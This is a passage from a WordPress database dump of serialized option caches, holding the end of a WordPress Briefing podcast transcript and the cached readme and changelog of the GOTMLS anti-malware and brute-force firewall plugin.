about companies that are coming together, companies that are merging. And in Matt&#8217;s answer, the part that I found the most interesting was when he said, &#8220;the point at which there is the most commercial opportunity is also the point at which there is the most opportunity for short-termism. He went on to talk about the importance of long-term thinking and collective thinking about what makes us, and us here means probably the WordPress project, more vibrant and vital in 10 or 20 or 30 years. One of the things that he specifically called out in that answer was the responsibility of larger companies in the ecosystem. For instance, like Automattic, to commit fully to giving back, there are many ways now that companies can give back to WordPress so that we all replenish the Commons. They can pay for volunteer contributors&#8217; time; they can create and sponsor entire teams through the Five for the Future program. They can contribute time through our outreach program. And they can even contribute to WordPress&#8217;s ability to own our own voice by engaging their audience&#8217;s awareness of what&#8217;s next in WordPress, or whatever. And I know this balance, this particular balance of paid contributors or sponsored contributors, compared to our volunteer contributors or self-sponsored contributors; I know that this balance is one that people keep an eagle eye on. I am consistently on a tight rope to appropriately balanced those voices. But as with so many things where balance is key, keeping an eye on the middle or the long-distance can really help us get it right.&nbsp;&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 03:23</strong></p>\n\n\n\n<p>The second question was one of cohesion and specifically cohesion over the competition. Brian asked how, if people feel disadvantaged, you can foster a feeling of cohesion rather than competition? And Matt&#8217;s first answer was that competition is great. Specifically, he said that competition is great as long as you consider where your collaboration fits into the mission. And he also spent some time exploring how competitors in the ecosystem can still work from a community-first mindset. I personally cannot agree enough about some of the benefits of collaboration alongside your competitors. I remind sponsored contributors from time to time, and I think it&#8217;s true for any contributor that you are an employee of your company first and a contributor to WordPress second. However, once you step into contribution time, your main concern is the users of WordPress, or new contributors, or the health of the WordPress ecosystem as a whole or the WordPress project. So you get all this subject matter expertise from competitive forces, collaborating in a very us versus the problem way. And when you do that, you&#8217;re always going to find a great solution. It may not be as fast as you want it to build things out in the open in public. And so sometimes we get it wrong and have to come back and fix it but still, given time, we&#8217;re going to come out with the best solution because we have so many skilled people working on this.&nbsp;&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 05:01</strong></p>\n\n\n\n<p>And then the third question that I wanted to really touch on is the question of those we leave behind. Brian asked Matt if he thought mid-sized agencies and mid-sized consultants were being squeezed out with the block editor. Matt&#8217;s high-level answer was no, and I tend to agree with him. It&#8217;s not all mid-sized anything any more than it&#8217;s all small-sized anything. His answer continued to look at what stands to change for users with the block editor and who really can stand to benefit. It made me think back to my WordPress 5.0 listening tour. We launched WordPress 5.0, which was, in case anyone forgets, the first release with the block editor in it. I took a six-month-long tour to anywhere that WordPressers were so I could hear their main worries, what Brian is saying in there, and what Matt is saying to really came up all the time in those conversations. And basically, it was that this update takes all the power away from people who are building websites. And in these conversations, and Matt and Brian&#8217;s conversation, it was really focused on our freelancers and consultants. But at the same time, all of them heard that this update gives power back to all of the people who could build websites.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 06:28</strong></p>\n\n\n\n<p>I could not shake the feeling at the time. And honestly, I can&#8217;t shake it now that no high-end consultants, or freelancers, or any other developer or site creator sit around just longing for maintenance work. After six months of talking to people, I didn&#8217;t hear anyone say, &#8220;you know, I just love making the same author card over and over and over.&#8221; Or, &#8220;updated the footer every week, this month. And that&#8217;s why I got into this business.&#8221; And more than the feeling that there just wasn&#8217;t anyone who just loved maintenance, I got a feeling that there were real problems that needed to be solved for these clients and that they wanted to solve them. And that they also would gladly trade updating footers for the much more interesting work of creating modern and stylish business hubs based on WordPress for the clients who trust them so much. All of that, I guess, is to say that, yes, the block editor does give power back to our clients again, but not at the expense of those who have to build the sites in the first place. I think it stands to restore everyone&#8217;s sense of agency more than we truly realize. So that&#8217;s my deep dive on WordCamp Europe; I included links to the demo and the talk below, just in case you haven&#8217;t seen them yet. And you want to get a little bit of insight into the full context of the conversations that I just did a bit of a deep dive into.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 08:15</strong></p>\n\n\n\n<p>And now it&#8217;s time for our smallest of big things. All right, I have three things for you today. Number one, tomorrow, we package WordPress 5.8 beta three. If you&#8217;ve never had a chance to stop by the core channel in slack for the past packaging process, I really encourage you to stop by; we call them release parties. It&#8217;s a bunch of people who stand around and help get it done. So you can also see how it gets done. And if you&#8217;re feeling brave, you can even try your hand at testing out one of the packages as soon as it&#8217;s ready. The second thing is that a week from tomorrow, we reach our first release candidate milestone. So if you have meant to submit any bugs or patches or if you&#8217;ve been procrastinating on documentation, or dev notes, right now is the time so that we can have a chance to get everything into the release by the time we reach the release candidate milestone on the 29th. And the third thing is that we are currently right in the middle of WordCamp Japan. That is a great opportunity to meet some contributors and maybe even get started with contributions yourself. So stop by if you haven&#8217;t had a chance to check it out already. I will leave a link in the show notes. And that, my friends, is your small list of big things. </p>\n\n\n\n<p>Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10837\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 22 Sep 2021 12:02:06 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Mon, 20 Sep 2021 12:00:00 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";}}s:5:\"build\";s:14:\"20210126075719\";}','no'),(510243,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1632355327','no'),(510971,'_site_transient_timeout_theme_roots','1632329952','no'),(510972,'_site_transient_theme_roots','a:5:{s:15:\"LambdaGammaZeta\";s:7:\"/themes\";s:7:\"hopeful\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";}','no'),(509160,'updraft_combine_jobs_around','1634449826','yes'),(510377,'_site_transient_apto-db-ready-d941baefc6','1','no');
INSERT INTO `lwz_options` VALUES (510292,'GOTMLS_get_URL_array','a:1:{s:32:\"8ad86b47666117af2cfa728b5115c0fc\";a:3:{s:4:\"time\";d:27205260;s:13:\"wp_remote_get\";a:6:{s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 22 Sep 2021 12:59:49 GMT\";s:12:\"content-type\";s:10:\"text/plain\";s:14:\"content-length\";s:5:\"28779\";s:13:\"last-modified\";s:29:\"Tue, 15 Jun 2021 18:40:25 GMT\";s:4:\"etag\";s:34:\"\"2548470//gotmls/trunk/readme.txt\"\";s:13:\"cache-control\";s:14:\"max-age=604800\";s:13:\"accept-ranges\";s:5:\"bytes\";}}s:4:\"body\";s:28779:\"=== Anti-Malware Security and Brute-Force Firewall ===\nPlugin URI: http://gotmls.net/\nAuthor: Eli Scheetz\nAuthor URI: http://wordpress.ieonly.com/category/my-plugins/anti-malware/\nContributors: scheeeli, gotmls\nDonate link: https://gotmls.net/donate/\nTags: security, firewall, anti-malware, scanner, automatic, repair, remove, malware, virus, threat, hacked, malicious, infection, timthumb, exploit, block, brute-force, wp-login, patch, antimalware, revslider, Revolution Slider\nVersion: 4.20.72\nStable tag: 4.20.72\nRequires at least: 3.3\nTested up to: 5.7.2\n\nThis Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.\n\n== Description ==\n\n**Features:**\n\n* Download Definition Updates to protect against new threats.\n* Run a Complete Scan to automatically remove known security threats, backdoor scripts, and database injections.\n* Firewall block SoakSoak and other malware from exploiting Revolution Slider and other plugins with known vulnerabilites.\n* Upgrade vulnerable versions of timthumb scripts.\n\n**Premium Features:**\n\n* Patch your wp-login and XMLRPC to block Brute-Force and DDoS attacks.\n* Check the integrity of your WordPress Core files.\n* Automatically download new Definition Updates when running a Complete Scan.\n\nRegister this plugin at [GOTMLS.NET](http://gotmls.net/) and get access to new definitions of \"Known Threats\" and added features like Automatic Removal, plus patches for specific security vulnerabilities like old versions of timthumb. Updated definition files can be downloaded automatically within the admin once your Key is registered. Otherwise, this plugin just scans for \"Potential Threats\" and leaves it up to you to identify and remove the malicious ones.\n\nNOTICE: This plugin make call to GOTMLS.NET to check for updates not unlike what WordPress does when checking your plugins and themes for new versions. Staying up-to-date is an essential part of any security plugin and this plugin can let you know when there are new plugin and definition update available. If you\'re allergic to \"phone home\" scripts then don\'t use this plugin (or WordPress at all for that matter).\n\n**Special thanks to:**\n\n* Clarus Dignus for design suggestions and graphic design work on the banner image.\n* Jelena Kovacevic and Andrew Kurtis of webhostinghub.com for providing the Spanish translation.\n* Marcelo Guernieri for the Brazilian Portuguese translation.\n* Umut Can Alparslan for the Turkish translation.\n\n== Installation ==\n\n1. Download and unzip the plugin into your WordPress plugins directory (usually `/wp-content/plugins/`).\n1. Activate the plugin through the \'Plugins\' menu in your WordPress Admin.\n1. Register on gotmls.net and download the newest definition updates to scan for Known Threats.\n\n== Frequently Asked Questions ==\n\n= Why should I register? =\n\nIf you register on [GOTMLS.NET](http://gotmls.net/) you will have access to download definitions of New Threats and added features like automatic removal of \"Known Threats\" and patches for specific security issues like old versions of timthumb and brute-force attacks on wp-login.php. Otherwise, this plugin only scans for \"Potential Threats\" on your site, it would then be up to you to identify the good from the bad and remove them accordingly. \n\n= How do I patch the Revolution Slider vulnerability? =\n\nEasy, if you have installed and activated my this Anti-Malware plugin on your site then it will automatically block attempts to exploit the Revolution Slider vulnerability.\n\n= How do I patch the wp-login vulnerability? =\n\nThe WordPress Login page is susceptible to a brute-force attack (just like any other login page). These types of attacks are becoming more prevalent these days and can sometimes cause your server to become slow or unresponsive, even if the attacks do not succeed in gaining access to your site. This plugin can apply a patch that will block access to the WordPress Login page whenever this type of attack is detected. Just click the Install Patch button under Brute-force Protection on the Anti-Malware Setting page. For more information on this subject [read my blog](http://gotmls.net/tag/wp-login-php/).\n\n= Why can\'t I automatically remove the \"Potential Threats\" in yellow? =\n\nMany of these files may use eval and other powerful PHP function for perfectly legitimate reasons and removing that code from the files would likely cripple or even break your site so I have only enabled the Auto remove feature for \"Know Threats\".\n\n= How do I know if any of the \"Potential Threats\" are dangerous? =\n\nClick on the linked filename to examine it, then click each numbered link above the file content box to highlight the suspicious code. If you cannot tell whether or not the code is malicious just leave it alone or ask someone else to look at it for you. If you find that it is malicious please send me a copy of the file so that I can add it to my definition update as a \"Know Threat\", then it can be automatically removed.\n\n= What if the scan gets stuck part way through? =\n\nFirst just leave it for a while. If there are a lot of files on your server it could take quite a while and could sometimes appear to not be moving along at all even if it really is working. If it still seems stuck after a while then try running the scan again, be sure you try both the Complete Scan and the Quick scan.\n\n= How did I get hacked in the first place? =\n\nFirst, don\'t take the attack personally. Lots of hackers routinely run automated script that crawl the internet looking for easy targets. Your site probably got hacked because you are unknowingly an easy target. This might be because you are running an older version of WordPress or have installed a Plugin or Theme with a backdoor or known security vulnerability. However, the most common type of infection I see is cross-contamination. This can happen when your site is on a shared server with other exploitable sites that got infected. In most shared hosting environments it\'s possible for hackers to use an one infected site to infect other sites on the same server, sometimes even if the sites are on different accounts.\n\n= What can I do to prevent it from happening again? =\n\nThere is no sure way to protect your site from every kind of hack attempt. That said, don\'t be an easy target. Some basic steps should include: hardening your password, keeping all your sites up-to-date, and run regular scans with Anti-Malware software like [GOTMLS.NET](http://gotmls.net/)\n\n= Why does sucuri.net or the Google Safe Browsing Diagnostic page still say my site is infected after I have removed the malicious code? =\n\nsucuri.net caches their scan results and will not refresh the scan until you click the small link near the bottom of the page that says \"Force a Re-scan\" to clear the cache. Google also caches your infected pages and usually takes some time before crawling your site again, but you can speed up that process by Requesting a Review in the Malware or Security section of [Google Webmaster Tools](https://www.google.com/webmasters/tools/). It is a good idea to have a Webmaster Tools account for your site anyway as it can provide lots of other helpful information about your site.\n\n== Screenshots ==\n\n1. The menu showing Anti-Malware options.\n2. The Scan Setting page in the admin.\n3. An example scan that found some threats.\n4. The results window when \"Automatic Repair\" fixes threats.\n5. The Quarantine showing threats that have been fix already.\n\n== Changelog ==\n\n= 4.20.72 =\n* Updated registration form to be more compatible with newer iframe restrictions.\n* Fixed session check on the Brute-Force patch to no longer need mod_rewrite.\n* Removed older code from WordPress Repository.\n\n= 4.20.59 =\n* Various minor bug fixes.\n* Added Core Files Definitions for ClassicPress.\n* Tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\n* Fixed a JavaScript error caused by a new French translation.\n* Checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\n* Updated some external links.\n* Tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\n* Added even more error handling to the DB Scan for servers with the PHP memory_limit set too low.\n* Modified the Directory Scan Depth to accept 0 as a value to indicate skipping the Directory Scan (use this to focus on the DB Scan).\n* Added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\n* Updated links to use HTTPS by default and fixed some old URLs.\n* Various performance improvements.\n* Added more error handling to the DB Scan.\n* Fixed a few minor bugs causing PHP Notices.\n* Fixed a path search to work on Windows servers.\n* Tweaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\n* Cleaned up the Nonce Token creation and storage functions.\n* Cleaned up View Quarantine page and fixed recovery link.\n* Added debugging for login errors WP head and footer Hooks.\n\n= 4.18.74 =\n* Fixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\n* Added wp_options table to the db_scan.\n* Fixed a few minor bugs in the db scan quarantine view.\n* Changed some wording and other minor fomatting issues.\n* Checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\n* Added a Warning message about the vulnerability in the yuzo-related-post plugin.\n* Updated the Quarantine interface and added a re-scan / re-clean feature.\n* Fixed a bug in the scan depth array that would produce PHP Notices in the error_log files under certain conditions.\n* Changed some wording and other minor fomatting issues.\n* Removed some outdated JavaScript that is no longer needed.\n* Checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\n* Fixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\n* Fixed a bug in the Firewall that prevented some iPad devices from logging in.\n* Fixed an encoding bug that prevented the Examine File window from dispaying some file formats.\n* Restored the File Details window in the Examine File window.\n* Updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\n* Added a whole new DB Scan category that looks for links and scripts injected directly into the database content and removes them.\n* Updated Firewall landing page for HTTPS compatibility.\n* Removed some old code that was no longer needed.\n* Added a feature to clear cache files before running the Complete Scan, this will speed up the scan and prevent malware from being saved on your cached paged.\n* Updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\n* Updated code for compatibility with WP 4.9.8 (latest release).\n* Fixed PHP Notice for the unknown offset of SERVER_parts.\n* Escaped single-quotes in translated strings for use within JavaScript.\n\n= 4.17.68 =\n* Updated code for compatibility with WP 4.9.7 (latest release).\n* Removed wrong size dashicon from Settings link in plugin list.\n* Removed the broken link to vote WORKS on wordpress.org.\n* Reordered priorety on fixing Known Threats to be more efficient.\n\n= 4.17.58 =\n* Updated code for compatibility with WP 4.9.4 (latest release).\n* Fixed dashicons sizing in css.\n* Add ability to update registration email from within the plugin settings.\n* Cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\n* Updated code for compatibility with WP 4.9.3 (latest release).\n* Fixed registration form and alternate domain for definition updates to work on HTTPS.\n* Fixed the wording on the Title check error message.\n\n= 4.17.44 =\n* Added Title check to make sure it does say you were hacked.\n* Updated code for compatibility with WP 4.8.3 (latest release).\n* Fixed Undefined variable error in Quarantine.\n* Fixed XSS vulnerability in nonce error output.\n\n= 4.17.29 =\n* Changed the definition update URL to only use SSL when required.\n* Updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\n* Added the Turkish translation thanks to Umut Can Alparslan.\n* Improved the auto update so that old definitions could be phased out and new threat types would be selected by default.\n* Fixed the admin username change feature on multisite installs.\n* Fixed the details window so that it scrolls to the highlighted code.\n* Set defaults to disable the Potential Threat scan if other threats definitions are enabled.\n* Encoded definitions array for DB storage.\n* Fixed syntax error in the XMLRPC patch for newer versions of Apache.\n* Added fall-back to manual updates if the Automatic update feature fails.\n* Fixed PHP Notices about undefined variable added in last Version release.\n* Improved Apache version detection.\n* Changed Automatic update feature to automatically download all definitions and firewall updates.\n* Added PHP and Apache version detections and changed the XMLRPC patch to work with Apache 2.4 directives.\n* Removed the onbeforeunload function because Norton detected it as a False Positive.\n* Removed code that was deprecated in PHP Version 7.\n* Fixed PHP Notice about an array to string conversion with some rare global variable conditions.\n* Added more firewall options.\n* Moved Scan Log from the Quarantine page to the main Setings page.\n* Fixed PHP Warning about an invalid argument in foreach and some other bugs too.\n* Fixed \"What to look for\" Options so that changes are saved.\n* Changed get_currentuserinfo to wp_get_current_user because the get_currentuserinfo function was deprecated in WP 4.5\n\n= 4.16.17 =\n* Removed Menu Item Placement Options because the add_object_page function was deprecated in WP 4.5.\n* Added firewall options for better compatibility with WP Firewall 2.\n* Fixed an XSS vulnerability in the debug output of the nonce token.\n* Moved the Firewall Options to it\'s own page linked to from the admin menu.\n* Moved the Quick Scan from the admin menu to the top of the Scan Settings page.\n* Fixed PHP Warning about in_array function expecting parameter 2 to be an array, found by Georgey B.\n* Made a few minor cosmetic changes and fixed a few other small bugs in the interface.\n* Fixed the Nonce Token error caused by W3 Total Cache breaking the set_transient function in WordPress.\n* Added the Brazilian Portuguese language files, thanks to Marcelo Guernieri for the translation.\n* Fixed the admin menu and also some links that did not work on Windows server.\n* Added Core Files to the Quick Scan list on the admin menu.\n* Added a nonce token to prevent Cross-Site Request Forgery by admins who are logged-in from another site.\n* Hardened against XSS vulnerability triggered by the file names being scanned (thanks to Mahadev Subedi).\n* Improved brute-force patch compatibility with alternate wp-config.php location.\n* Had to remove the encoding of the Default Definitions to meet the WordPress Plugin Guidelines.\n* Improved the JavaScript in the new Brute-Force login patch so that it works with caching enabled on the login page.\n* Improved the Brute-Force login patch with custom fields and JavaScript. \n* Added a Save button to that Scan Settings page.\n* Fixed a bug in the XMLRPC Patch \"Unblock\" feature.\n* Added a link to purge the deleted Quarantine items from the database.\n* Added firewall option to Block all XMLRPC calls.\n* Fixed a few cosmetic bugs in the quarantine and firewall options.\n* Fixed a bugs in the Quarantine that was memory_limit errors if there number of files in the was too high.\n* Added the highlight malicious code feature back to the Quarantine file viewer.\n* Added the ability to change the admin username if the current username is \"admin\".\n* Improved the code in the Brute-Force Protection patch.\n* Fixed a few bugs in the Core Files Check that was preventing it from fixing some unusual file modifications.\n* Fixed a major bug that made multisite scan extremely slow and sometimes error out.\n* Moved all ajax call out of the init function and into their own functions for better handling time.\n* Moved the quarantine files into the database and deleted the old directory in uploads.\n* Fixed some minor formatting issues in the HTML output on the settings page.\n* Added a warning message if base64_decode has been disabled.\n* Hardened against injected HTML content by encoding the tags with variables.\n* Fixed debug option to exclude individual definitions.\n* Hardened admin_init with current_user_can and realpath on the quarantine file deletion (thanks to J.D. Grimes).\n* Fixed another XSS vulnerabilities in the admin (thanks to James H.)\n* Hardened against XSS vulnerabilities in the admin (thanks to Tim Coen).\n* Added feature to restore default settings for Exclude Extensions.\n* Changed the encoding on the index.php file in the Quarantine to make it more human-readable.\n* Fixed a few small bugs that were throwing PHP Notices in some configurations and added more info to some error messages.\n* Extended execution_time during the Fix process to increase the number of files that could be fixed at a time.\n* Added a Quarantine log to the database.\n* Fixed a couple of minor bugs that would throw PHP notices.\n\n= 4.15.16 =\n* Created an automatic update feature that downloads any new definition updates before starting the scan.\n* Added WordPress Core files to the new definitions update process and included a scan option to check the integrity of the Core files.\n* Automatically whitelisted the unmodified WordPress Core files.\n* Made more improvements to the Brute-Force protection patch and other minor cosmetic changes to the interface.\n* Protected the HTML in my plugin from filter injections and fixed a few other minor bugs.\n* Fixed a problem with deleting files from the Quarantine folder.\n* Added a descriptive reason to the error displayed if the fix was unsuccessful.\n* Added link to restore the default location of the Examine Results window.\n* Improved the encoding of definition updates so that they would not be blocked by poorly written firewall rules.\n* Suppressed the \"Please make a donation\" nag if the fix was unsuccessful, to avoid confusion over premium services.\n* Removed debug alert from initial session check.\n* Improved rewrite compatibility of session check for the Brute-Force Protection Installation.\n* Improved session check for the option to Install Brute-Force Protection and added an error message on failure.\n* Improved support for Multisite by only allowing Network Admins access to the Anti-Malware menu.\n* Added link to view a simple scan history on the Quarantine page.\n* Updated firewall to better protect agains new variations of the RevSlider Exploit.\n* Improved check for session support before giving the option to Install Brute-Force patch.\n* Added option to skip scanning the Quarantined files.\n* Updated Brute-Force patch to fix the problem of being included more that once.\n* Fixed a few minor bugs (better window positioning and css, cleaner results page, updated new help tab, etc.).\n* Made sure that the plugin does not check my servers for updates unless you have registered (this opt-in requirement is part of the WordPress Repository Guidelines).\n* Added exception for the social.png files to the skip files by extension list.\n* Fixed removal of Known Threats from files in the Quarantine directory.\n* Block SoakSoak and other malware from exploiting the Slider Revolution Vulnerability (THIS IS A WIDESPREAD THREAT RIGHT NOW).\n* Enabled the Brute-Force protection option directly from the Settings page.\n* Fixed window position to auto-adjust on small screens.\n\n= 4.14.47 =\n* Major upgrade to the protection for wp-login.php Brute-Force attempts.\n* Fixes a bug in setting the permissions for read-only files so that they could still be cleaned.\n* Fixes a minor bug with pass-by-reference which raises a fatal error in PHP v5.4.\n* Enhanced the Examine File window with better styles and more info.\n* Changed form submission of encrypted file lists to array values instead of keys.\n* Fixes other minor bugs.\n* Made the Examine File window sizable.\n* Fixed a few small bugs and removed some old code.\n* Added a link to my new twitter account.\n* Re-purposed Quick Scan to just scan the most affected areas.\n* Set the registration form to display by defaulted in the definition update section.\n* Fixed a few small bugs in advanced features and directory depth determination.\n* Fixed a session bug to display the last directory scanned.\n* Fixed a few small cosmetic bugs for WP 3.8.\n* Added Spanish translation, thanks to Jelena Kovacevic and Andrew Kurtis at webhostinghub.com.\n* Updated string in the code and added a .pot file to be ready for translation into other languages.\n* Added \"Select All\" checkbox to Quarantine and a new button to delete items from the Quarantine.\n* Added a trace.php file for advanced session tracking.\n* Fixed undefined index bug with menu_group item in settings array.\n* Added support for multisite network admin menu and the ability to restrict admin access.\n* Fixed a session bug in the progress bar related to the last release.\n* Fixed a session bug that conflicted with jigoshop. (Thanks dragonflyfla)\n* Fixed a few bug in the Whitelist definition feature.\n\n= 3.07.06 =\n* Added SSL support for definition updates and registration form.\n* Upgraded the Whitelist feature so the it could not contain duplicates.\n* Downgraded the WP-Login threat and changed it to an opt-in fix.\n* Fixed a bug in the Add to Whitelist feature so the you do not need to update the definitions after whitelisting a file.\n* Added ability to whitelist files.\n* Fixed a major bug in yesterdays release broke the login page on some sites.\n* Added a patch for the wp-login.php brute force attack that has been going around.\n* Created a process to restore files from the Quarantine.\n* Fixed a few other small bugs including path issues on Winblows server.\n\n= 1.3.02.15 =\n* Improved security on the Quarantine directory to fix the 500 error on some servers.\n* Fixed count of Quarantined items.\n* Added htaccess security to the Uploads directory.\n* Linked the Quarantined items to the File Examiner.\n* Added a scan category for Backdoor Scripts.\n* Consolidated the Definition Types and added a Whitelist category.\n* Completely redesigned the Definition Updates to handle incremental updates.\n* Added \"View Quarantine\" to the menu.\n* Enhanced Output Buffer to work with compression enabled (like ob_gzhandler).\n* Moved the quarantine to the uploads directory to protect against blanket inclusion.\n* Fixed Output Buffer issue for when ob_start has already been called.\n* Enhanced the Automatic Fix process to handle bad directory permissions.\n* Added more detailed error messages for different types of file errors.\n* Improved overall error handling.\n* Minor UI enhancements and a few bug fixes.\n* Completely revamped the scan engine to handle large file systems with better error handling.\n* Enhanced the results for the Automatic Fix process.\n* Fixed a few other small bugs.\n* Enhanced the iFrame for the File Viewer and Automatic Fix process.\n* Improved error handling during the scan.\n* Moved the File Viewer and Automatic Fix process into an iFrame to decrease scan time and memory usage.\n* Enhanced the Automatic Fix process for better success with read-only files.\n* Improved code cleanup process and general efficiency of the scan.\n* Encoded definition update for better compatibility with some servers that have post limitation.\n* Fixed XSS vulnerability.\n* Changed registration to allow for multiple sites/keys to be registered under one user/email.\n* Changed auto-update path to update threat level array for all new definition updates.\n* Updated timthumb replacement patch to version 2.8.10 per WordPress.org plugins requirement.\n* Fixed option to exclude directories so that the scan would not get stuck if omitted.\n* Added support for winblows servers using BACKSLASH directory structures.\n* Changed definition updates to write to the DB instead of a file.\n\n= 1.2.03.23 =\n* First versions available for WordPress (code removed, no longer compatible).\n\n== Upgrade Notice ==\n\n= 4.20.72 =\nUpdated registration form, fixed session check, and removed older code from WordPress Repository.\n\n= 4.20.59 =\nVarious minor bug fixes, added Core Files Definitions for ClassicPress, and tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\nFixed a JavaScript error caused by a new French translation and checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\nUpdated some external links and tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\nAdded even more error handling to the DB Scan for low memory_limit, modified the Directory Scan Depth to accept 0 as way to skip the Directory Scan, and added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\nUpdated links, added more error handling to the DB Scan, various performance improvements, fixed path to work on Windows servers and a few minor bugs causing PHP Notices, and weaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\nCleaned up the Nonce Token code and Quarantine page, fixed recovery link, and added debugging for login errors plus WP head and footer Hooks.\n\n= 4.18.74 =\nFixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\nAdded wp_options table to the db_scan and fixed a few minor bugs in the quarantine view, and changed some wording and checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\nAdded a Warning message about the vulnerability in the yuzo-related-post plugin,  updated the Quarantine interface with a re-scan / re-clean feature, fixed a bug in the scan depth array that would produce PHP Notices, changed some wording and other minor fomatting issues, and checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\nFixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\nFixed a few minor bugs and updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\nAdded a whole new DB Scan category, updated Firewall landing page, removed some old code that was no longer needed, clear cache files before running the Complete Scan,, and updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\nUpdated code for compatibility with WP 4.9.8, fixed PHP Notice and escaped single-quotes in translated strings.\n\n= 4.17.68 =\nUpdated code for compatibility with WP 4.9.7, removed dashicon from Settings link and the broken vote WORKS link, and reordered priorety on fixing Known Threats.\n\n= 4.17.58 =\nUpdated code for compatibility with WP 4.9.4, fixed dashicons sizing in css, add ability to update registration email from within the plugin settings, and cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\nUpdated code for compatibility with WP 4.9.3, fixed registration form and alternate domain for definition updates to work on HTTPS, and fixed the wording on the Title Check error message.\n\n= 4.17.44 =\nAdded Title check to make sure it does say you were hacked, updated code for compatibility with WP 4.8.3 and fixed Undefined variable error in Quarantine and an XSS vulnerability in nonce error output.\n\n= 4.17.29 =\nChanged the definition update URL to only use SSL when required, and updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\nAdded the Turkish translation thanks to Umut Can Alparslan, improved the auto update feature, and fixed the admin username change feature on multisite installs (Plus many other improvement from v4.16.X: see Changelog for details).\n\n= 4.16.17 =\nRemoved Menu Item Placement Options that were deprecated in WP 4.5, Added firewall options for better compatibility with WP Firewall 2, and fixed an XSS vulnerability in the debug output of the nonce token (Plus many other improvement from v4.15.X: see Changelog for details).\n\n= 4.15.16 =\nCreated automatic 